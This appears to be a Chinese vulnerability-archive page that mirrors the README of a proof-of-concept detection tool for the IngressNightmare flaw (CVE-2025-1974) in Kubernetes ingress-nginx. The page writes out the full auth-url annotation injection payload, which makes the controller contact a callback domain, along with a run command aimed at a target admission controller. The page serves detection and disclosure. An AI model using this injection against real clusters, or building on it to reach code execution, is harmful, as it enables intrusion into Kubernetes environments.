关联漏洞
标题:
Kubernetes ingress-nginx 安全漏洞
(CVE-2025-1974)
描述:Kubernetes ingress-nginx是云原生计算基金会(Cloud Native Computing Foundation)开源的Kubernetes 的入口控制器,使用NGINX作为反向代理和负载均衡器。 Kubernetes ingress-nginx存在安全漏洞,该漏洞源于在某些条件下,未认证的攻击者可通过访问pod网络在ingress-nginx控制器环境中执行任意代码,可能导致Secrets泄露。
描述
Proof-of-Concept Tool to detect IngressNightmare (CVE-2025-1974) via (non-intrusive) active means.
介绍
# IngressNightmare Detection Tool
## Overview
This tool provides a non-intrusive detection capability for the IngressNightmare vulnerability chain ([CVE-2025-1974](https://nvd.nist.gov/vuln/detail/CVE-2025-1974)) affecting Ingress NGINX Controller. It specifically leverages the auth-url annotation injection vector ([CVE-2025-24514](https://nvd.nist.gov/vuln/detail/CVE-2025-24514)) to verify the presence of this critical vulnerability without executing arbitrary code.
## Technical Background
The IngressNightmare vulnerability chain allows attackers to inject arbitrary NGINX configuration directives through various Ingress annotation fields. When these malicious Ingress resources are processed by the admission controller, the injected directives are evaluated during the NGINX configuration validation phase (`nginx -t`).
This PoC specifically exploits the `auth-url` annotation vulnerability by injecting the `error_log` directive with a syslog server pointing to an attacker-controlled domain. During configuration validation, NGINX will:
1. Parse the injected configuration
2. Resolve the specified domain via DNS
This DNS resolution activity provides a reliable signal that the target is vulnerable without requiring code execution or service disruption.
## Usage
1. Establish a DNS callback listener using Burp Collaborator, interactsh, or any DNS monitoring service.
2. Execute the detection tool:
```
$ python3 detect.py -t https://target-admission-controller:443 -c w00tw00t.lf4v7uehamhtt4hufhstpla09rfi38rx.oastify.com
```
3. If vulnerable, you will observe DNS resolution attempts to your DNS callback domain:
## Detection Methodology
The tool crafts a specially formed AdmissionReview object containing an Ingress resource with the following injection payload:
```
nginx.ingress.kubernetes.io/auth-url: "http://example.com/#;\n resolver 8.8.8.8;\n error_log syslog:server=unique-id.oastify.com:80 debug;\n #"
```
This payload:
- Uses the comment character (`#`) to terminate the URL
- Injects a newline followed by a resolver directive
- Adds the `error_log` directive with syslog pointing to the DNS callback domain
- Comments out the remainder to maintain syntactic validity
When processed by a vulnerable admission controller, this results in an outbound DNS lookup that confirms the presence of the vulnerability.
## Limitations
This tool only detects the presence of the vulnerability and does not attempt to exploit it for arbitrary code execution.
## Credits
https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities
文件快照
[4.0K] /data/pocs/6e2e313a2110bf5ccfddbd5f8d3cba307e5bfbca
├── [3.1K] detect.py
├── [1.3K] poc.json
├── [ 88K] poc.png
└── [2.5K] README.md
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。